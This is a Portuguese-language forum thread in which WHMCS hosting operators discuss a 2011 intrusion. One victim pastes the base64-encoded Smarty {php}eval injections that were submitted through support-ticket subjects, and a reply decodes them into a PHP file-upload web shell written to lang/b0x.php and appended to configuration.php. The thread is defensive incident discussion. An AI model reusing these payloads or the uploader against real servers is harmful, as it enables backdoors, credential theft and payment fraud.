Ir para conteúdo
  • Cadastre-se

Tentativas de invasão em meu WHMCS

McGuyver

Por McGuyver
em Gerenciadores de hospedagem

 Compartilhar

Posts Recomendados

edvan

edvan

Postado
Postado
Eu acredito que todos os IPs são de proxy, quem iria querer invadir uma empresa do brasil, sendo de outro país? kkk

Clebson,

Aí que você se engana... um cliente meu não tinha aplicado o patch de segurança e um houve uma invasão e o script via debug comprovou que era um código famoso indiano!

Link para o comentário
Compartilhar em outros sites
Visitante

Visitante

Postado
Postado
Clebson,

Aí que você se engana... um cliente meu não tinha aplicado o patch de segurança e um houve uma invasão e o script via debug comprovou que era um código famoso indiano!

Assim como o script utilizado pelos brasileiros não são brasileiros, e sim estrangeiros!

Link para o comentário
Compartilhar em outros sites
Clebson

Clebson

Postado
Postado
Clebson,

Aí que você se engana... um cliente meu não tinha aplicado o patch de segurança e um houve uma invasão e o script via debug comprovou que era um código famoso indiano!

Pode até ser, mas não faz sentido, por que eles iriam querer invadir empresas do brasil, e não do país deles? Será por diversão?

Mas mesmo assim, continuo com a minha opinião, os códigos não deveriam ser divulgados... rsrs

Link para o comentário
Compartilhar em outros sites
Lperez

Lperez

Postado
Postado

No dia 08/12/2011 recebi o código abaixo

Client: xxx xxxx #228

Department: Suporte

Subject: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNtbG1LRUJqYjNCNUtDUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmRHMXdYMjVoYldVblhTd2dKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwcEtTQjdJR1ZqYUc4Z0p6eGlQbFZ3Ykc5aFpDQlRWVXRUUlZNZ0lTRWhQQzlpUGp4aWNqNDhZbkkrSnpzZ2ZRMEtaV3h6WlNCN0lHVmphRzhnSnp4aVBsVndiRzloWkNCSFFVZEJUQ0FoSVNFOEwySStQR0p5UGp4aWNqNG5PeUI5RFFwOURRby9QaUE9Jyk7DQokZm8gPSBmb3BlbiAoImxhbmcvYjB4LnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php}

Priority: Medium

---

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNtbG1LRUJqYjNCNUtDUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmRHMXdYMjVoYldVblhTd2dKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwcEtTQjdJR1ZqYUc4Z0p6eGlQbFZ3Ykc5aFpDQlRWVXRUUlZNZ0lTRWhQQzlpUGp4aWNqNDhZbkkrSnpzZ2ZRMEtaV3h6WlNCN0lHVmphRzhnSnp4aVBsVndiRzloWkNCSFFVZEJUQ0FoSVNFOEwySStQR0p5UGp4aWNqNG5PeUI5RFFwOURRby9QaUE9Jyk7DQokZm8gPSBmb3BlbiAoImxhbmcvYjB4LnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php}

IP Address: 87.106.140.33

No dia 18/12/2011, Recebi o seguinte código

Client: aasa

Department: Fale Conosco

Subject: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBZ0pHbGtJRDBnSkY5SFJWUmJKMk50WkNkZE95QnBaaUFvSkdsa0lEMDlKM1Z3SnlrZ2V5QmxZMmh2SUNjOFptOXliU0JoWTNScGIyNDlJaUlnYldWMGFHOWtQU0p3YjNOMElpQmxibU4wZVhCbFBTSnRkV3gwYVhCaGNuUXZabTl5YlMxa1lYUmhJaUJ1WVcxbFBTSjFjR3h2WVdSbGNpSWdhV1E5SW5Wd2JHOWhaR1Z5SWo0bk95QmxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzZ2FXWW9JQ1JmVUU5VFZGc25YM1Z3YkNkZElEMDlJQ0pWY0d4dllXUWlJQ2tnZXlBSmFXWW9RR052Y0hrb0pGOUdTVXhGVTFzblptbHNaU2RkV3lkMGJYQmZibUZ0WlNkZExDQWtYMFpKVEVWVFd5ZG1hV3hsSjExYkoyNWhiV1VuWFNrcElIc2daV05vYnlBblBHSStWWEJzYjJGa0lGTlZTMU5GVXlBaElTRThMMkkrUEdKeVBqeGljajRuT3lCOUlBbGxiSE5sSUhzZ1pXTm9ieUFuUEdJK1ZYQnNiMkZrSUVkQlIwRk1JQ0VoSVR3dllqNDhZbkkrUEdKeVBpYzdJSDBnZlNCOUlEOCsiKTsgICRoYW5kbGUgPSBmb3BlbigiY29uZmlndXJhdGlvbi5waHAiLCAiciIpOyAgJG91dHB1dCA9IGZyZWFkKCRoYW5kbGUsIGZpbGVzaXplKCJjb25maWd1cmF0aW9uLnBocCIpKTsgICR3cml0ZSA9ICRvdXRwdXQuJGNvZGU7ICRmbyA9IGZvcGVuKCJjb25maWd1cmF0aW9uLnBocCIsICJ3Iik7ICBmd3JpdGUoJGZvLCR3cml0ZSk7'));{/php}

Priority: Medium

---

saaaaaaaaaaaaa

----------------------------

IP Address: 91.99.108.24

No dia 21 tentei acessar administração do whmcs e a senha não entrava, tive que resetar a senha.

E ontem a coisa fedeu, recebi um email do pagseguro informando que havia feito um pagamento no valor de R$430,00 que eu não havia feito para uma tal pessoa, liguei imediatamente no pagseguro e abri um chamado informando que não fiz esse pagamento.

Mas para minha surpresa, tentei acessar meu email de cadastro do pagseguro e não consegui, tentei acessar o WHM da minha revenda e não consegui, tentei acessar o Moip e não consegui, o camarada trocou todas minhas senhas, a minha sorte foi que no Moip e Pagseguro tenho outras contas de emails cadastradas a acabei recebendo o email de notificação da transação.

Já troquei a senhas de tudo, limpei o diretorio templates_c

Fiz a atualização do arquivo functions.php

Verifiquei o diretório lang e não encontrei nada.

Mas no diretório modules/reports encontrei esse arquivo module_eval_system.php que estava com a data de 08/12/2011

Se alguém quiser eu posto o código do arquivo.

Se alguém puder descodificar os códigos acima, e me informar o que foi alterado em meu whmcs, ficaria muito grato.

Obrigado!

Link para o comentário
Compartilhar em outros sites
Visitante

Visitante

Postado
Postado
No dia 08/12/2011 recebi o código abaixo

Client: xxx xxxx #228

Department: Suporte

Subject: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNtbG1LRUJqYjNCNUtDUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmRHMXdYMjVoYldVblhTd2dKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwcEtTQjdJR1ZqYUc4Z0p6eGlQbFZ3Ykc5aFpDQlRWVXRUUlZNZ0lTRWhQQzlpUGp4aWNqNDhZbkkrSnpzZ2ZRMEtaV3h6WlNCN0lHVmphRzhnSnp4aVBsVndiRzloWkNCSFFVZEJUQ0FoSVNFOEwySStQR0p5UGp4aWNqNG5PeUI5RFFwOURRby9QaUE9Jyk7DQokZm8gPSBmb3BlbiAoImxhbmcvYjB4LnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php}

Decodificado:

$code = base64_decode('<?php

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

if( $_POST['_upl'] == "Upload" ) {

if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }

else { echo '<b>Upload GAGAL !!!</b><br><br>'; }

}

?> ');

$fo = fopen ("lang/b0x.php","w");

fwrite($fo,$code);

---

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNtbG1LRUJqYjNCNUtDUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmRHMXdYMjVoYldVblhTd2dKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwcEtTQjdJR1ZqYUc4Z0p6eGlQbFZ3Ykc5aFpDQlRWVXRUUlZNZ0lTRWhQQzlpUGp4aWNqNDhZbkkrSnpzZ2ZRMEtaV3h6WlNCN0lHVmphRzhnSnp4aVBsVndiRzloWkNCSFFVZEJUQ0FoSVNFOEwySStQR0p5UGp4aWNqNG5PeUI5RFFwOURRby9QaUE9Jyk7DQokZm8gPSBmb3BlbiAoImxhbmcvYjB4LnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php}

Decodificado:

$code = base64_decode('<?php

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

if( $_POST['_upl'] == "Upload" ) {

if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }

else { echo '<b>Upload GAGAL !!!</b><br><br>'; }

}

?> ');

$fo = fopen ("lang/b0x.php","w");

fwrite($fo,$code);

-{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBZ0pHbGtJRDBnSkY5SFJWUmJKMk50WkNkZE95QnBaaUFvSkdsa0lEMDlKM1Z3SnlrZ2V5QmxZMmh2SUNjOFptOXliU0JoWTNScGIyNDlJaUlnYldWMGFHOWtQU0p3YjNOMElpQmxibU4wZVhCbFBTSnRkV3gwYVhCaGNuUXZabTl5YlMxa1lYUmhJaUJ1WVcxbFBTSjFjR3h2WVdSbGNpSWdhV1E5SW5Wd2JHOWhaR1Z5SWo0bk95QmxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzZ2FXWW9JQ1JmVUU5VFZGc25YM1Z3YkNkZElEMDlJQ0pWY0d4dllXUWlJQ2tnZXlBSmFXWW9RR052Y0hrb0pGOUdTVXhGVTFzblptbHNaU2RkV3lkMGJYQmZibUZ0WlNkZExDQWtYMFpKVEVWVFd5ZG1hV3hsSjExYkoyNWhiV1VuWFNrcElIc2daV05vYnlBblBHSStWWEJzYjJGa0lGTlZTMU5GVXlBaElTRThMMkkrUEdKeVBqeGljajRuT3lCOUlBbGxiSE5sSUhzZ1pXTm9ieUFuUEdJK1ZYQnNiMkZrSUVkQlIwRk1JQ0VoSVR3dllqNDhZbkkrUEdKeVBpYzdJSDBnZlNCOUlEOCsiKTsgICRoYW5kbGUgPSBmb3BlbigiY29uZmlndXJhdGlvbi5waHAiLCAiciIpOyAgJG91dHB1dCA9IGZyZWFkKCRoYW5kbGUsIGZpbGVzaXplKCJjb25maWd1cmF0aW9uLnBocCIpKTsgICR3cml0ZSA9ICRvdXRwdXQuJGNvZGU7ICRmbyA9IGZvcGVuKCJjb25maWd1cmF0aW9uLnBocCIsICJ3Iik7ICBmd3JpdGUoJGZvLCR3cml0ZSk7'));{/php}

Decodificado:

$code = base64_decode('<?php

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

if( $_POST['_upl'] == "Upload" ) {

if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }

else { echo '<b>Upload GAGAL !!!</b><br><br>'; }

}

?> ');

$fo = fopen ("lang/b0x.php","w");

fwrite($fo,$code);

Link para o comentário
Compartilhar em outros sites
tekobr

tekobr

Postado
Postado

Eu acho que é muita irresponsabilidade usar módulos de pagamento ou módulos que ficam mostrando saldo de MoIP/PagSeguro/etc no WHMCS que precisam gravar sua senha em um arquivo ou BD no seu servidor!!!

Vocês nunca pensaram que isso fosse acontecer?!

A primeira coisa que me veio na cabeça quando vi esses módulos é que seria muito fácil para o invasor sacar o dinheiro!!! Nunca usei e nunca vou usar, é muita irresponsabilidade e certamente quem usa isso não tem capacidade de ser empresário...

#prontofalei

Link para o comentário
Compartilhar em outros sites
Visitante
Este tópico está impedido de receber novos posts.
 Compartilhar
Ir para a lista de tópicos

  • Quem Está Navegando   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.
×
×
  • Criar Novo...

Informação Importante

Concorda com os nossos termos?

  I accept